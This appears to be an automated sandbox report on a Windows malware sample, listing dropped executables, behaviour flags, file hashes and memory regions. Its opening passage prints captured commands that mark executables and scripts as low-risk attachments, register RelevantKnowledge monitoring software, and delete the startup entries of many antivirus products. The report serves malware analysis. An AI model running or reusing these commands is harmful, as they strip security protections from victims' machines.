"DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\3153.exeC:\Users\Admin\AppData\Local\Temp\3153.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\3403.exeC:\Users\Admin\AppData\Local\Temp\3403.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3403.exeC:\Users\Admin\AppData\Local\Temp\3403.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 14603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3B96.exeC:\Users\Admin\AppData\Local\Temp\3B96.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\936B.exeC:\Users\Admin\AppData\Local\Temp\936B.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 7442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 8442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 8202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8ce78b13ac7c4c69c41d65af180d51c1
SHA18d59540790dfb716c1580aa5ec0e1ffb26ad3eed
SHA256f285de202c983c211c0dcc3e3baa4293b9f1d94272552b75840d7ffdec9ed443
SHA512c9b95a1475c98764a5fc11c309dbfa53237323ab52681a3ab65583f234eb82bc52ae87ddd845d334c1b7124c460a8c52f4efad287054e6d93916d5807240271e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f1b160ab95f106dd13dfcf8d05e0b976
SHA1eb5639c4e3ac2dc464b5b0ca0b803127b4d24bcf
SHA256e4059ef810c98d6328d0cc37d3fca5a88549044a3fce535db1e027d4067e0168
SHA5129c34285d084563ce73d5edf539d186e8c07ce357af46c4ee0b9ae5dbf11a4ddb1be3c1177d0a91169d205e5fb1383590f977657c102f4a9de115bd217a9856e1
-
C:\Users\Admin\AppData\Local\Temp\2EF0.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\2EF0.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\3153.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\3153.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\3403.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\3403.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\3403.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\3B96.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\3B96.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\936B.exeMD5
4297e9e27602c1ab910f6c214a2b3ce7
SHA1a2ee7d601157c05818a3fd2dd46e51b272078b95
SHA256c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d
SHA512a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5
-
C:\Users\Admin\AppData\Local\Temp\936B.exeMD5
4297e9e27602c1ab910f6c214a2b3ce7
SHA1a2ee7d601157c05818a3fd2dd46e51b272078b95
SHA256c6ce666831320963b654b1730a946524fb370c4d7a41822deee3bbe6f367fb8d
SHA512a0e4e3a61e564b27d86683a56b54b9305d6566a0388d33c05644b88a5fb071e99e8bb1972a9e05cd2fe963420a0a9a45a61a8de6709914be3d9d8982916759e5
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
469602cbc560ba3db0b148b419ee102b
SHA16aab3456fd5f51baba8985de261b706d14ec548b
SHA256817257701107988072eeb51bf3bafd8abe7b64b09b86f2c14547c4a6cc6fba9e
SHA5122979f142438ba760c08c9d6af3af60186e0d6b1fe7e6436ffac368b5902729c9ceb351cf85e097b8c594a376f686b7e276305eac08b04624d747b15d17b4a3fd
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/196-214-0x0000000000000000-mapping.dmp
-
memory/196-221-0x0000000000BE0000-0x0000000000BE7000-memory.dmpFilesize
28KB
-
memory/196-222-0x0000000000BD0000-0x0000000000BDC000-memory.dmpFilesize
48KB
-
memory/208-124-0x0000000002DD0000-0x0000000002F1A000-memory.dmpFilesize
1.3MB
-
memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/208-132-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/208-182-0x000000000044003F-mapping.dmp
-
memory/208-118-0x0000000000000000-mapping.dmp
-
memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/668-157-0x0000000000000000-mapping.dmp
-
memory/680-213-0x00000000079E0000-0x00000000079E1000-memory.dmpFilesize
4KB
-
memory/680-209-0x0000000004680000-0x0000000004681000-memory.dmpFilesize
4KB
-
memory/680-232-0x00000000097B0000-0x00000000097B1000-memory.dmpFilesize
4KB
-
memory/680-237-0x0000000004683000-0x0000000004684000-memory.dmpFilesize
4KB
-
memory/680-239-0x0000000009320000-0x000000000947B000-memory.dmpFilesize
1.4MB
-
memory/680-208-0x0000000004682000-0x0000000004683000-memory.dmpFilesize
4KB
-
memory/680-201-0x0000000000000000-mapping.dmp
-
memory/1320-171-0x0000000006C60000-0x0000000006C61000-memory.dmpFilesize
4KB
-
memory/1320-173-0x00000000074E0000-0x00000000074E1000-memory.dmpFilesize
4KB
-
memory/1320-192-0x00000000088F0000-0x00000000088F1000-memory.dmpFilesize
4KB
-
memory/1320-191-0x0000000007CA0000-0x0000000007CA1000-memory.dmpFilesize
4KB
-
memory/1320-190-0x0000000008970000-0x0000000008971000-memory.dmpFilesize
4KB
-
memory/1320-177-0x0000000006CD0000-0x0000000006CD1000-memory.dmpFilesize
4KB
-
memory/1320-236-0x0000000000600000-0x000000000060F000-memory.dmpFilesize
60KB
-
memory/1320-235-0x0000000000610000-0x0000000000619000-memory.dmpFilesize
36KB
-
memory/1320-206-0x00000000066B3000-0x00000000066B4000-memory.dmpFilesize
4KB
-
memory/1320-162-0x0000000000000000-mapping.dmp
-
memory/1320-234-0x0000000000000000-mapping.dmp
-
memory/1320-166-0x00000000064E0000-0x00000000064E1000-memory.dmpFilesize
4KB
-
memory/1320-167-0x0000000006CF0000-0x0000000006CF1000-memory.dmpFilesize
4KB
-
memory/1320-168-0x00000000066B0000-0x00000000066B1000-memory.dmpFilesize
4KB
-
memory/1320-169-0x00000000066B2000-0x00000000066B3000-memory.dmpFilesize
4KB
-
memory/1320-170-0x0000000006AE0000-0x0000000006AE1000-memory.dmpFilesize
4KB
-
memory/1396-154-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/1396-150-0x0000000000000000-mapping.dmp
-
memory/1396-153-0x0000000002CC0000-0x0000000002CFB000-memory.dmpFilesize
236KB
-
memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmpFilesize
580KB
-
memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmpFilesize
40.7MB
-
memory/1640-197-0x0000000000000000-mapping.dmp
-
memory/1872-115-0x0000000000402E1A-mapping.dmp
-
memory/1872-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1924-287-0x000000007E520000-0x000000007E521000-memory.dmpFilesize
4KB
-
memory/1924-219-0x0000000000A00000-0x0000000000A6B000-memory.dmpFilesize
428KB
-
memory/1924-270-0x0000000008CC0000-0x0000000008CF3000-memory.dmpFilesize
204KB
-
memory/1924-255-0x0000000000D22000-0x0000000000D23000-memory.dmpFilesize
4KB
-
memory/1924-254-0x0000000000D20000-0x0000000000D21000-memory.dmpFilesize
4KB
-
memory/1924-242-0x0000000000000000-mapping.dmp
-
memory/1924-200-0x0000000000000000-mapping.dmp
-
memory/1924-290-0x0000000000D23000-0x0000000000D24000-memory.dmpFilesize
4KB
-
memory/1924-218-0x0000000000A70000-0x0000000000AE4000-memory.dmpFilesize
464KB
-
memory/2080-285-0x0000000000000000-mapping.dmp
-
memory/2080-288-0x0000000000F00000-0x0000000000F05000-memory.dmpFilesize
20KB
-
memory/2080-289-0x0000000000EF0000-0x0000000000EF9000-memory.dmpFilesize
36KB
-
memory/2100-145-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/2100-149-0x0000000005120000-0x0000000005121000-memory.dmpFilesize
4KB
-
memory/2100-176-0x0000000006B30000-0x0000000006B31000-memory.dmpFilesize
4KB
-
memory/2100-174-0x0000000006A30000-0x0000000006A31000-memory.dmpFilesize
4KB
-
memory/2100-164-0x00000000067F0000-0x00000000067F1000-memory.dmpFilesize
4KB
-
memory/2100-160-0x0000000006C00000-0x0000000006C01000-memory.dmpFilesize
4KB
-
memory/2100-159-0x0000000006500000-0x0000000006501000-memory.dmpFilesize
4KB
-
memory/2100-141-0x00000000772E0000-0x000000007746E000-memory.dmpFilesize
1.6MB
-
memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmpFilesize
4KB
-
memory/2100-135-0x0000000000000000-mapping.dmp
-
memory/2100-148-0x00000000052C0000-0x00000000052C1000-memory.dmpFilesize
4KB
-
memory/2100-147-0x0000000005130000-0x0000000005131000-memory.dmpFilesize
4KB
-
memory/2100-144-0x0000000005740000-0x0000000005741000-memory.dmpFilesize
4KB
-
memory/2100-146-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/2432-258-0x00000000004C0000-0x00000000004CC000-memory.dmpFilesize
48KB
-
memory/2432-256-0x00000000004D0000-0x00000000004D6000-memory.dmpFilesize
24KB
-
memory/2432-247-0x0000000000000000-mapping.dmp
-
memory/2856-259-0x0000000000000000-mapping.dmp
-
memory/2856-262-0x0000000003720000-0x0000000003724000-memory.dmpFilesize
16KB
-
memory/2856-265-0x0000000003710000-0x0000000003719000-memory.dmpFilesize
36KB
-
memory/2972-139-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/2972-156-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/2972-138-0x00000000033E0000-0x0000000003623000-memory.dmpFilesize
2.3MB
-
memory/2972-121-0x0000000000000000-mapping.dmp
-
memory/2972-155-0x00000000051E0000-0x00000000053F1000-memory.dmpFilesize
2.1MB
-
memory/3008-240-0x0000000000CA0000-0x0000000000CA5000-memory.dmpFilesize
20KB
-
memory/3008-241-0x0000000000C90000-0x0000000000C99000-memory.dmpFilesize
36KB
-
memory/3008-238-0x0000000000000000-mapping.dmp
-
memory/3016-117-0x00000000012D0000-0x00000000012E6000-memory.dmpFilesize
88KB
-
memory/3128-116-0x0000000000030000-0x000000000003A000-memory.dmpFilesize
40KB
-
memory/3464-230-0x0000000001030000-0x000000000103B000-memory.dmpFilesize
44KB
-
memory/3464-228-0x0000000001040000-0x0000000001047000-memory.dmpFilesize
28KB
-
memory/3464-225-0x0000000000000000-mapping.dmp
-
memory/3476-130-0x0000000005760000-0x0000000005761000-memory.dmpFilesize
4KB
-
memory/3476-131-0x0000000005160000-0x0000000005161000-memory.dmpFilesize
4KB
-
memory/3476-179-0x0000000005130000-0x0000000005151000-memory.dmpFilesize
132KB
-
memory/3476-128-0x0000000000760000-0x0000000000761000-memory.dmpFilesize
4KB
-
memory/3476-125-0x0000000000000000-mapping.dmp
-
memory/3476-133-0x0000000005260000-0x000000000575E000-memory.dmpFilesize
5.0MB
-
memory/3476-134-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/3728-283-0x0000000000CA0000-0x0000000000CA5000-memory.dmpFilesize
20KB
-
memory/3728-286-0x0000000000C90000-0x0000000000C99000-memory.dmpFilesize
36KB
-
memory/3728-263-0x0000000000000000-mapping.dmp
-
memory/3844-508-0x0000000000000000-mapping.dmp